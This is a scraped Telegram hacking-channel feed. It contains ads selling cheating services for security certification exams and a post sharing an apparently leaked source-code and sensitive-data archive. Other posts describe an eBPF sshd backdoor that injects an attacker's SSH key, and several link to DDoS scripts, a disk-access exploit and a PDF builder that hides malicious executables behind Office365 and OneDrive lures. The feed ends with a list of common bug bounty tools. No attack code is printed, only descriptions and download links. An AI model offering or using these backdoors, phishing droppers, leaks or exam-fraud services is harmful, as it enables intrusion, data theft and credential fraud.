CrackCodes 🇮🇳
15.9K subscribers
1.89K photos
386 videos
722 files
3.67K links
Official Websites: https://crackcodes.in | https://system32.in |
For Bug Hunters: https://system32.ink

Admin: @MynK0x00
Admin Math: prapattimynk.crackcodes.in


Be Secure~
जय श्री राम
Download Telegram
I Can Help You To Clear & Give the training & exam solutions on the below certifications
1_CEH.
2_CEH Practical.
3_eJPT.
4_eCCPTv2.
5_eWPT.
6_eWPTxv2.
7_CRTP.
8_CRTO.
9_OSCP.
10_OSWE.
11_OSEP.
12_OSWP.
13_CPENT
14_CHFI
15_eCPTxv2
16_PNPT
17_Burpsuite exam
Remote Exam Support possible.
If anyone needs message me.
Lower prices & passing guaranteed!
Follow: https://t.me/alexserviceez
Ping @examsolutionz

We have added new exam of burpsuite solutions
1👍1
Forwarded from 卩ro 爪Cracker
tripping.NTDC.COM.PK.zip
230.3 MB
Sourcecode & Sensitive Leaks.

NTDC Tripping Server.
😱2
https://t.me/sidewinders join this channel for more updates .........
gg's hacker's ( have a good day —❤️
‼️Here we go again

Get a (.in) Free Domain for 1 Year!
Offer valid from 26-30th January 2023.
condition is youw ill get 1 Domain for Free.

Website
#hacker_bano_chutiya_nhe 🌜👾🌛
3👍1
sshd_backdoor

About Using ebpf technique, hijacking the process during sshd service getting the ~/.ssh/authorized_keys to authorize user logging and injecting our public key make our login successful.

Main Process in ebpf program:
Hook OpenAt syscall enter: check if the sshd process call this, log the pid of sshd.
Hook OpenAt Syscall exit: check the pid logged. logging the fd of pid, map pidfd.
Hook Read Syscall enter: check the pid logged. logging the user_space_char_buffer of pid.
Hook Read Syscall exit: check the pid logged. find the buffer and change the buffer into our Key. Then delete pid in map to avoid blocking administrators’ keys be read.

Download Link: https://system32.ink/news-feed/p/184/
#DDoS Scripts and Methods

L7/L4/L3 & Game METHODS (USE ONLY FOR EDUCATIONAL PURPOSES!!!)

This repo consists of various DDoS scripts, collected from internet. Layer-4 and Layer-7 levels can be targeted using these scripts.

Note: Scripts written in 'C' need to be compiled with GCC compiler, first.

https://system32.ink/news-feed/p/185/
KillMyOTA

OTA Killer for iOS 15.0 - 16.1.2

Download:- https://system32.ink/news-feed/p/186/
Rust PDF builder

It includes these premade templates:
- adobeacrobate
- dropbox
- googledrive
- office365
- onedrive

Custom Templates (Own PDF files) will also work.

Usage: rust-pdf-creator.exe <input_url> <template/file/list>

Example: rust-pdf-creator.exe http://example.com/123.exe onedrive. Download: https://system32.ink/news-feed/p/188/
Forwarded from CYBER TRICKS ZONE 🇮🇳🚩 (𝙋𝙧𝙤𝙩𝙤𝙘𝙤𝙡 𝙉𝙞𝙘𝙠)
Bugbounty Notes 📒
Inclue OWASP Top 10 And more
#bugbounty #Infsoec

Amazing Git Repo : https://github.com/Voorivex/pentest-guide

Check This Out 👌
Exploit for full access to disk C:\  (for all users)

Download:https://system32.ink/news-feed/p/190/
👍1
GHunt (v2) is Google's offensive framework designed for efficient development. It is currently focused on OSINT, but any Google-related usage is possible..
https://github.com/mxrch/GHunt
https://systemweakness.com/google-mail-hacking-ghunt-v2-gmail-osint-6c76ce78ad35
⚙️ Complete Bug Bounty tool List ⚙️

Enjoy :)


dnscan https://github.com/rbsec/dnscan

Knockpy https://github.com/guelfoweb/knock

Sublist3r https://github.com/aboul3la/Sublist3r

massdns https://github.com/blechschmidt/massdns

Nmap https://nmap.org

Masscan https://github.com/robertdavidgraham/masscan

EyeWitness https://github.com/ChrisTruncer/EyeWitness

DirBuster https://sourceforge.net/projects/dirbuster/

dirsearch https://github.com/maurosoria/dirsearch

Gitrob https://github.com/michenriksen/gitrob

git-secrets https://github.com/awslabs/git-secrets

sandcastle https://github.com/yasinS/sandcastle

bucket_finder https://digi.ninja/projects/bucket_finder.php

GoogD0rker https://github.com/ZephrFish/GoogD0rker/

Wayback Machine https://web.archive.org

waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050

Sn1per https://github.com/1N3/Sn1per/

XRay https://github.com/evilsocket/xray

wfuzz https://github.com/xmendez/wfuzz/

patator https://github.com/lanjelot/patator

datasploit https://github.com/DataSploit/datasploit

hydra https://github.com/vanhauser-thc/thc-hydra

changeme https://github.com/ztgrace/changeme

MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/

Apktool https://github.com/iBotPeaches/Apktool

dex2jar https://sourceforge.net/projects/dex2jar/

sqlmap http://sqlmap.org/

oxml_xxe https://github.com/BuffaloWill/oxml_xxe/

XXE Injector https://github.com/enjoiz/XXEinjector

The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool

ground-control https://github.com/jobertabma/ground-control

ssrfDetector https://github.com/JacobReynolds/ssrfDetector

LFISuit https://github.com/D35m0nd142/LFISuite

GitTools https://github.com/internetwache/GitTools

dvcs-ripper https://github.com/kost/dvcs-ripper

tko-subs https://github.com/anshumanbh/tko-subs

HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer

Race the Web https://github.com/insp3ctre/race-the-web

ysoserial https://github.com/GoSecure/ysoserial

PHPGGC https://github.com/ambionics/phpggc

CORStest https://github.com/RUB-NDS/CORStest

Retire-js https://github.com/RetireJS/retire.js

getsploit https://github.com/vulnersCom/getsploit

Findsploit https://github.com/1N3/Findsploit

bfac https://github.com/mazen160/bfac

WPScan https://wpscan.org/

CMSMap https://github.com/Dionach/CMSmap

Amass https://github.com/OWASP/Amass

Extra Tools
http://projectdiscovery.io

@freehackingresources
👌2